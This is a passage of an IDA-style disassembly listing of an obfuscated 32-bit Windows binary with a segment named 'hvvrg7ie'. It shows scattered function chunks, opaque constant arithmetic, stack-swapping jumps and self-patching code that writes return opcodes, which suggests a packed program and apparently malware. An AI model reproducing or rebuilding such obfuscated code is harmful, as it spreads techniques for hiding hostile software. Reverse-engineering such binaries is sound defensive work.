; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_441AF7:				; CODE XREF: sub_44D2F8-14276j
		jg	loc_447560
		adc	edx, 0E8853B46h
		mov	[ecx], ebp
		jmp	loc_454587
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------

loc_441B0A:				; CODE XREF: hvvrg7ie:0043FCDCj
		mov	eax, 0A11F455Ah
		call	sub_458A13
		push	esi
		push	32533836h
		pop	esi
		jmp	loc_439E2E
; ---------------------------------------------------------------------------

loc_441B20:				; CODE XREF: hvvrg7ie:00454497j
		js	loc_440F6B
		jg	loc_44E99D

; =============== S U B	R O U T	I N E =======================================



sub_441B2C	proc near		; CODE XREF: sub_4419C0:loc_4597ECp

; FUNCTION CHUNK AT 0043913C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004433DF SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00459ED3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A827 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	edx
		jmp	loc_45A827
sub_441B2C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_441B36:				; CODE XREF: sub_453405:loc_459087j
		xchg	esi, [esp+8+var_8]
		jmp	loc_44591E
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_441B3E:				; CODE XREF: sub_43E128+573Cj
		jns	loc_4458D0

loc_441B44:				; CODE XREF: sub_43E128:loc_453EA5j
		call	sub_454099
		jmp	loc_45A442
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B70B

loc_441B4E:				; CODE XREF: sub_45B70B:loc_447FABj
		ror	eax, 1Ch
		mov	ds:dword_43CD98, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_45B70B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424A6

loc_441B58:				; CODE XREF: sub_4424A6-53B4j
		rol	eax, 1Ch
		push	offset sub_4586F0
		jmp	loc_454DFB
; END OF FUNCTION CHUNK	FOR sub_4424A6

; =============== S U B	R O U T	I N E =======================================



sub_441B65	proc near		; CODE XREF: hvvrg7ie:0044A877j
					; sub_44D976+2p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00439A45 SIZE 00000006 BYTES

		xchg	edx, [esp+0]
		pop	edx
		call	sub_4450A8
		mov	eax, [esp-4+arg_0]
		jmp	loc_439A45
sub_441B65	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		shr	eax, 0Fh
		jmp	loc_44F9C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D47E

loc_441B7E:				; CODE XREF: sub_43D47E+17228j
		call	sub_450C5A
		mov	ds:dword_41D17C, eax
		lea	eax, nullsub_12
		mov	byte ptr [eax],	0C3h
		jmp	loc_4443E8
; END OF FUNCTION CHUNK	FOR sub_43D47E
; ---------------------------------------------------------------------------
		xchg	ecx, [esp]
		jmp	loc_442DFA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_441B9F:				; CODE XREF: sub_43E128+CFFDj
		mov	eax, [ebp-8]
		cdq
		add	eax, [esp-4+arg_0]
		jmp	loc_450D2D
; ---------------------------------------------------------------------------

loc_441BAB:				; CODE XREF: sub_43E128:loc_43E138j
		mov	eax, [ebp-4]
		call	sub_454E9F

loc_441BB3:				; CODE XREF: sub_43E98F:loc_43DDADj
		push	eax
		call	sub_455ACA
		cmp	dword ptr [ebp-10Ch], 656C6946h
		jnz	loc_44D054
		jmp	loc_450531
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------

loc_441BCE:				; CODE XREF: hvvrg7ie:004542CBj
		popf
; START	OF FUNCTION CHUNK FOR sub_45493B

loc_441BCF:				; CODE XREF: sub_45493B:loc_4542BAj
		or	eax, 0C9394CE7h
		cmp	eax, 0F54CE3EEh
		jmp	loc_4542F6
; END OF FUNCTION CHUNK	FOR sub_45493B

; =============== S U B	R O U T	I N E =======================================



sub_441BE0	proc near		; CODE XREF: hvvrg7ie:00443D78j
					; hvvrg7ie:00459EA5p
		xchg	edi, [esp+0]
		pop	edi
		pop	ebp

locret_441BE5:				; CODE XREF: hvvrg7ie:loc_45696Ej
		retn
sub_441BE0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_441BE6:				; CODE XREF: hvvrg7ie:00443441j
					; sub_451E6D+2E90j
		jmp	loc_4493E9
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445934

loc_441BEB:				; CODE XREF: sub_445934+A3D7j
		jmp	loc_4592B3
; END OF FUNCTION CHUNK	FOR sub_445934
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_441BF0:				; CODE XREF: sub_43AB99+FF3Cj
		jmp	loc_44622B
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------

loc_441BF5:				; CODE XREF: hvvrg7ie:00449505j
		jmp	loc_43A2C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_441BFA:				; CODE XREF: sub_43EB47-178j
		adc	ebx, 679B9D3Bh

loc_441C00:				; CODE XREF: sub_43EB47:loc_44B401j
		call	sub_440C61

loc_441C05:				; CODE XREF: hvvrg7ie:00453A3Bj
		jmp	loc_454804
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B99

loc_441C0A:				; CODE XREF: sub_446B99+8E49j
		jz	loc_4454B6
		jg	sub_44DD3E
		mov	edx, ecx
; END OF FUNCTION CHUNK	FOR sub_446B99
; START	OF FUNCTION CHUNK FOR sub_439873

loc_441C18:				; CODE XREF: sub_439873:loc_441464j
					; sub_44D671+8j ...
		jmp	loc_4532EE
; ---------------------------------------------------------------------------

loc_441C1D:				; CODE XREF: sub_4546E9-FC7Ej
					; sub_439873+1321Dj
		pop	ecx
		pop	ebp
		jmp	nullsub_137
; END OF FUNCTION CHUNK	FOR sub_439873
; ---------------------------------------------------------------------------

loc_441C24:				; CODE XREF: hvvrg7ie:0043E7CAj
		ja	loc_43F417

; =============== S U B	R O U T	I N E =======================================



sub_441C2A	proc near		; CODE XREF: sub_441FE4+18B9Ep

; FUNCTION CHUNK AT 0044523C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CBE9 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	ecx, 0BA2794F7h
		jmp	loc_44CBE9
sub_441C2A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	[edi], ebx
		jmp	sub_44C1F3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D5

loc_441C40:				; CODE XREF: sub_44B2D5:loc_439177j
		jnz	loc_43A47A
; END OF FUNCTION CHUNK	FOR sub_44B2D5
; START	OF FUNCTION CHUNK FOR sub_458F7F

loc_441C46:				; CODE XREF: sub_458F7F+Aj
		jmp	loc_44DD9D
; END OF FUNCTION CHUNK	FOR sub_458F7F
; ---------------------------------------------------------------------------
		popf
		add	eax, edx
		push	0EF5AE8Dh
		jmp	loc_43A47A

; =============== S U B	R O U T	I N E =======================================



sub_441C58	proc near		; CODE XREF: hvvrg7ie:0043C1FCj
					; sub_45A234+12p

; FUNCTION CHUNK AT 004472BF SIZE 00000008 BYTES

		xchg	esi, [esp+0]
		pop	esi
		call	sub_4438FA
		pop	ecx
		jmp	loc_4472BF
sub_441C58	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_441C67:				; CODE XREF: sub_43D285:loc_442259j
		mov	[ecx], eax
		pop	ecx
		push	esi
		pushf
		jmp	loc_4439C6
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------

loc_441C71:				; CODE XREF: hvvrg7ie:00457E9Ej
		and	esi, ebp
		adc	edi, 5B9E2EDFh
		rol	edi, 1Ah

loc_441C7C:				; CODE XREF: hvvrg7ie:loc_43F1F5j
		jmp	loc_44E56C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466CE

loc_441C81:				; CODE XREF: hvvrg7ie:0043A3A5j
					; sub_4466CE:loc_44F499j ...
		call	dword ptr [ebp-4]
		neg	eax
		sbb	eax, eax
		jmp	loc_4451B7
; END OF FUNCTION CHUNK	FOR sub_4466CE
; ---------------------------------------------------------------------------

loc_441C8D:				; DATA XREF: sub_446966-D352o
		pop	edx
		mov	[ecx], edx
		pop	ecx
		pushf
		jmp	loc_459728
; ---------------------------------------------------------------------------
		rol	edi, 1Dh
		jnp	sub_444CE5
		jmp	sub_443C1D
; ---------------------------------------------------------------------------
		push	offset sub_449387
		jmp	loc_45232D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_441CAF:				; CODE XREF: sub_4465A6-3497j
		and	ecx, 0FF4B0F9h
		test	ecx, 1
		jmp	loc_439EC1
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
		dd 0DBE9FE3Bh
		db 0E4h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_441CC7:				; CODE XREF: sub_451E6D:loc_43D52Cj
		cmp	dword ptr [ebp-0Ch], 0
		jz	loc_4445F9
		jmp	loc_440514
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
		push	836B1CD3h
		pop	eax
		or	eax, 15E6FACBh
		js	loc_442C9F
		or	eax, eax
		jnz	loc_44D961
		jmp	loc_43C878
; ---------------------------------------------------------------------------

loc_441CF5:				; DATA XREF: sub_4449AD-68E8o
		add	eax, 17991237h
		add	eax, ebp
		add	eax, 0FB1D90C4h
		push	eax
		push	edi
		push	0B5D1B3DBh
		jmp	loc_4504F1
; ---------------------------------------------------------------------------
		mov	[ebx], ecx
		jmp	sub_44403F
; ---------------------------------------------------------------------------

loc_441D16:				; DATA XREF: sub_450810+AE2Co
		mov	eax, [esp]
		push	edx
		call	sub_4500E7
		mov	eax, 637A7446h
		call	sub_4584A8
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_441D29:				; CODE XREF: sub_456F9F:loc_44277Aj
		add	esi, 0FB24A24Bh
		xchg	esi, [esp-4+arg_0]
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E75B

loc_441D37:				; CODE XREF: sub_43E75B:loc_458D70j
		and	esi, 8DBA5B6Ch
		sub	esi, 8BBD5BDEh
		add	esi, 75F2B66h
		mov	[esi], eax
		pop	esi
		lea	eax, sub_4447AC
		mov	byte ptr [eax],	0C3h
		jmp	loc_442841
; END OF FUNCTION CHUNK	FOR sub_43E75B
; ---------------------------------------------------------------------------
		push	esi
		jmp	loc_4495B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AF96

loc_441D60:				; CODE XREF: sub_454099-118B5j
					; hvvrg7ie:0044DCAEj ...
		mov	dword ptr [ebp-4], 1
		mov	eax, [ebp-4]
		mov	esp, ebp
		pop	ebp
		jmp	loc_451539
; END OF FUNCTION CHUNK	FOR sub_43AF96
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450810

loc_441D72:				; CODE XREF: sub_450810-4573j
		mov	eax, [esp+0]
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+4+var_4]
		push	eax
		push	0A6A1F87Bh
		xchg	edi, [esp+0Ch+var_C]
		mov	eax, edi
		jmp	loc_459B57
; END OF FUNCTION CHUNK	FOR sub_450810
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_441D8B:				; CODE XREF: sub_45889B:loc_45448Bj
		pushf
		sbb	esi, 0E4620328h
		jmp	loc_4506F0
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
		popf
		jmp	sub_459A95

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_441D9D	proc near		; DATA XREF: sub_43E854o
		push	ebp
		mov	ebp, esp
		push	offset sub_44809F
		jmp	nullsub_38
sub_441D9D	endp


; =============== S U B	R O U T	I N E =======================================



sub_441DAA	proc near		; DATA XREF: sub_439953+9A5Eo

; FUNCTION CHUNK AT 00439CF1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043C1C2 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00450A65 SIZE 00000005 BYTES

		push	7EB847D7h
		pop	ebx
		add	ebx, 16C8B083h
		or	ebx, 4700514Dh
		jmp	loc_43C1C2
sub_441DAA	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_468. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_441DC2:				; CODE XREF: sub_43FC15:loc_44B862j
		mov	edi, ebp
		xchg	edi, [esp+4+var_4]
		mov	ebp, esp
		push	ecx
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	al, [eax]
		jo	loc_44E79E
		jmp	loc_44B453
; END OF FUNCTION CHUNK	FOR sub_43FC15

; =============== S U B	R O U T	I N E =======================================



sub_441DDD	proc near		; DATA XREF: sub_43D910+6D01o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00442A17 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00446BD7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004489C1 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044CF23 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044DD76 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045150A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00451A0D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004584D6 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045A61E SIZE 0000000B BYTES

		push	ebx
		push	209656ECh
		pop	ebx
		rol	ebx, 0Eh
		cmp	ebx, 0F5D63424h
		jmp	loc_44CF23
sub_441DDD	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_441DF2	proc near		; DATA XREF: hvvrg7ie:0044AAA6o
		pop	ebx
		call	sub_459593
sub_441DF2	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44AB90

loc_441DF8:				; CODE XREF: sub_44AB90+Ej
		jmp	loc_45424A
; END OF FUNCTION CHUNK	FOR sub_44AB90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_441DFD:				; CODE XREF: sub_44E3B3:loc_43EC39j
		mov	ebx, 7609840Ch
		rol	ebx, 0Eh
		add	ebx, ebp
		cmp	ebp, 0B33BC4FBh
		jmp	loc_457CD3
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BFCF

loc_441E12:				; CODE XREF: sub_43BFCF+13j
		jge	loc_458E67
		sub	edi, 0DDD40F17h
		jmp	loc_458E5F
; END OF FUNCTION CHUNK	FOR sub_43BFCF

; =============== S U B	R O U T	I N E =======================================



sub_441E23	proc near		; DATA XREF: sub_4495B9+9A74o

; FUNCTION CHUNK AT 00439746 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043AF83 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043CC9F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00442741 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443869 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447389 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00447E8B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C1C6 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044D5DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DF3C SIZE 0000001E BYTES

		or	eax, eax
		jnz	loc_43CC9F
		jmp	loc_443869
sub_441E23	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448768

loc_441E30:				; CODE XREF: sub_448768:loc_448774j
		xor	eax, [ebx+ecx+4]
		cmp	eax, 7C61090Eh
		retn
; END OF FUNCTION CHUNK	FOR sub_448768
; ---------------------------------------------------------------------------

loc_441E3A:				; CODE XREF: hvvrg7ie:004496C9j
		jmp	sub_455751
; ---------------------------------------------------------------------------

loc_441E3F:				; CODE XREF: hvvrg7ie:00446168j
		jmp	loc_45A629

; =============== S U B	R O U T	I N E =======================================



sub_441E44	proc near		; CODE XREF: sub_44BB51+4p
					; sub_45B5DC+4p
		xor	bx, bx
		call	sub_446966

locret_441E4C:				; CODE XREF: sub_453CDE:loc_453CE6j
		retn
sub_441E44	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_94. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		xor	ebp, edi
		jmp	sub_45B261
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44809F

loc_441E55:				; CODE XREF: sub_44809F+Fj
		test	byte ptr [eax-7], 10h
		jz	loc_456C83
		inc	dword ptr [ebp-8]
; END OF FUNCTION CHUNK	FOR sub_44809F
; START	OF FUNCTION CHUNK FOR sub_43F0A1

loc_441E62:				; CODE XREF: sub_43F0A1:loc_440705j
					; hvvrg7ie:00451CD6j
		mov	eax, [ebp-8]
		push	offset loc_459EA3
		jmp	nullsub_39
; END OF FUNCTION CHUNK	FOR sub_43F0A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D16B

loc_441E6F:				; CODE XREF: sub_43D16B:loc_43A962j
		pop	eax
		or	eax, 235FB41Eh
		and	eax, 0E88D0E3Fh
		xor	eax, 7047C1BDh
		add	eax, 0E7FA9023h
		jmp	loc_4583D2
; END OF FUNCTION CHUNK	FOR sub_43D16B
; ---------------------------------------------------------------------------

locret_441E8D:				; CODE XREF: hvvrg7ie:loc_455C0Ej
		retn
; ---------------------------------------------------------------------------

loc_441E8E:				; CODE XREF: hvvrg7ie:00456F08j
		jmp	loc_43B74E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_362. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439953

loc_441E94:				; CODE XREF: sub_439953+9A63j
		jmp	nullsub_440
; END OF FUNCTION CHUNK	FOR sub_439953
; ---------------------------------------------------------------------------
		mov	esi, 97BEF6E9h
		jmp	loc_449783
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_350. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_441EA4:				; DATA XREF: sub_44403F+Co
		add	edx, 86F037FBh
		mov	[edx], eax
		pop	edx
		mov	eax, [ebp-24h]
		jmp	loc_43B5DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_441EB5:				; CODE XREF: sub_43B3BE+252Bj
		jge	loc_441966
		sbb	edx, ecx
		xor	ecx, eax

loc_441EBF:				; CODE XREF: sub_43B3BE:loc_44E0D8j
		xor	eax, 0BA553DAEh
		jmp	loc_451A3C
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_441ECA:				; CODE XREF: sub_442FD1-3A34j
		jg	nullsub_82
		ror	edi, 5
		cmp	ebp, edi
		jmp	loc_439011
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_441EDA:				; CODE XREF: sub_455087:loc_44AA4Cj
		add	eax, 282F644Ah
		mov	eax, [eax]
		cmp	byte ptr [eax],	0
		jnz	loc_45925A
		jmp	loc_45877A
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414D3

loc_441EF0:				; CODE XREF: sub_4414D3:loc_43AD68j
		jz	loc_43B9B5
; END OF FUNCTION CHUNK	FOR sub_4414D3
; START	OF FUNCTION CHUNK FOR sub_449E59

loc_441EF6:				; CODE XREF: sub_449E59+5j
		jmp	loc_44A2A4
; END OF FUNCTION CHUNK	FOR sub_449E59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4484E1

loc_441EFB:				; CODE XREF: sub_4484E1-6E23j
		jmp	loc_44DD11
; END OF FUNCTION CHUNK	FOR sub_4484E1
; ---------------------------------------------------------------------------
		pushf
		sub	edi, ebx
		xchg	ebx, ebp
		jmp	loc_43B9B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451442

loc_441F0A:				; CODE XREF: sub_451442-15BC6j
		mov	edi, ebp
		xchg	edi, [esp+4+var_4]
		mov	ebp, esp
		push	edi

loc_441F12:				; CODE XREF: hvvrg7ie:loc_43B7D6j
		mov	edi, ecx
		jmp	loc_4449E0
; END OF FUNCTION CHUNK	FOR sub_451442
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_441F19:				; CODE XREF: sub_442FD1:loc_44C85Cj
		rol	esi, 1Bh
		or	esi, 0B3BF8F53h
		rol	esi, 0Fh
		or	esi, 27DAC777h
		add	esi, 1047B505h
		xchg	esi, [esp+4+var_4]
		jmp	sub_457C82
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_441F39:				; CODE XREF: sub_44616F:loc_44CC94j
		add	eax, ebp
		add	eax, 9609C6FEh
		push	edx
		add	edx, edi
		jmp	loc_44B16E
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439873

loc_441F49:				; CODE XREF: sub_439873:loc_443631j
		sub	esi, 8C495C9Ch
		add	esi, 49A0360Dh
		mov	[esi], eax
		pop	esi
; END OF FUNCTION CHUNK	FOR sub_439873
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_124. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_441F59:				; CODE XREF: sub_445CCD+10j
		jmp	loc_4428C9
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45488E

loc_441F5E:				; CODE XREF: sub_45488E-1662Dj
					; hvvrg7ie:00450E7Dj
		rol	eax, 0Bh
		jmp	loc_4436AE
; END OF FUNCTION CHUNK	FOR sub_45488E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_441F66:				; CODE XREF: sub_43F227:loc_4498C5j
					; hvvrg7ie:0045778Fj
		sub	eax, edx

loc_441F68:				; CODE XREF: hvvrg7ie:loc_43AD38j
		js	loc_45A569
		sbb	eax, 0EBF074EFh
		mov	edx, ebx
		call	sub_4504E0

loc_441F7B:				; CODE XREF: sub_43AFB6+1B943j
		jmp	loc_445B75
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_441F80:				; CODE XREF: sub_44059F+19BDFj
		pushf
		mov	edx, [ebp+0]
		xor	edi, edx
		adc	edx, ecx

loc_441F88:				; CODE XREF: sub_44059F:loc_43DF6Bj
					; sub_45038B:loc_443E79j ...
		jmp	loc_45024D
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_441F8D:				; CODE XREF: sub_44059F+12B36j
					; sub_45038B+4DA2j
		xchg	edx, [esp+0Ch+var_C]
		push	offset aRyzhmne	; "RYZhMNE"
		jmp	nullsub_405
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
		push	460A60D6h
		jmp	sub_44F879
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4591C3

loc_441FA4:				; CODE XREF: sub_4591C3:loc_45677Aj
		xor	edi, 0A405817Eh
		add	edx, edi
		push	offset loc_44D4D8
		jmp	nullsub_431
; END OF FUNCTION CHUNK	FOR sub_4591C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_441FB6:				; CODE XREF: sub_43E60A:loc_44F822j
					; sub_43E60A:loc_452C5Bj
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_450C4C
		jmp	loc_4475E7
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504E0

loc_441FC7:				; CODE XREF: sub_4504E0:loc_455D59j
		push	offset sub_43F907
		jmp	loc_4446CF
; END OF FUNCTION CHUNK	FOR sub_4504E0

; =============== S U B	R O U T	I N E =======================================



sub_441FD1	proc near		; DATA XREF: sub_448BC0-F3B6o

; FUNCTION CHUNK AT 004411D8 SIZE 00000005 BYTES

		add	eax, 0F844F597h
		rol	eax, 19h
		push	offset loc_44DEEC
		jmp	loc_4411D8
sub_441FD1	endp


; =============== S U B	R O U T	I N E =======================================



sub_441FE4	proc near		; CODE XREF: sub_441E23-86C2p
					; hvvrg7ie:00443D4Cj

; FUNCTION CHUNK AT 0043D08D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043E1A8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043F803 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044483F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044856F SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044A317 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044A5C6 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00450DC8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450E15 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045324E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457304 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457FB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458679 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045AB73 SIZE 00000019 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	1A246D0Dh
		pop	edi
		or	edi, 63F1A346h
		and	edi, 0D87D19ABh
		xor	edi, 601A9913h
		jmp	loc_457FB3
sub_441FE4	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_160. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D017

loc_442006:				; CODE XREF: sub_44D017+5j
		jmp	nullsub_296
; END OF FUNCTION CHUNK	FOR sub_44D017
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449D38

loc_44200B:				; CODE XREF: sub_449D38-23B7j
		mov	[ecx], eax
		jmp	loc_45764C
; END OF FUNCTION CHUNK	FOR sub_449D38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_442012:				; CODE XREF: sub_44388C:loc_43C54Dj
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		jmp	loc_43F1A6
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD0B

loc_44201E:				; CODE XREF: sub_43CD0B:loc_44B386j
		add	esi, 494592DBh
		cmp	ebp, 402D70ACh
		jmp	loc_44399C
; END OF FUNCTION CHUNK	FOR sub_43CD0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_44202F:				; CODE XREF: sub_43E128+14C64j
		jz	loc_444B43
		jmp	loc_45708C
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_44203A:				; CODE XREF: sub_43C0DE:loc_43CE7Cj
					; sub_455087:loc_442A39j
		ror	ebx, 12h
		jmp	loc_45325A
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------

loc_442042:				; CODE XREF: hvvrg7ie:004419F7j
		jg	sub_44CF7D
		jge	loc_44586D
		jg	loc_4417B7
		push	60D266A9h
		jmp	loc_4530C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_44205E:				; CODE XREF: sub_442FD1:loc_4592A0j
		jge	loc_45B28A
		push	0DF2CFD24h
		jmp	loc_45A6C9
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45535C

loc_44206E:				; CODE XREF: sub_45535C:loc_45A414j
		sub	eax, 9C73804Dh
		push	ebx
		push	offset sub_4551B7
		jmp	loc_455C13
; END OF FUNCTION CHUNK	FOR sub_45535C
; ---------------------------------------------------------------------------
		sbb	edi, ebx
		jmp	sub_44ABE8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_105. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439AE3

loc_442087:				; CODE XREF: sub_439AE3+Bj
		jmp	nullsub_40
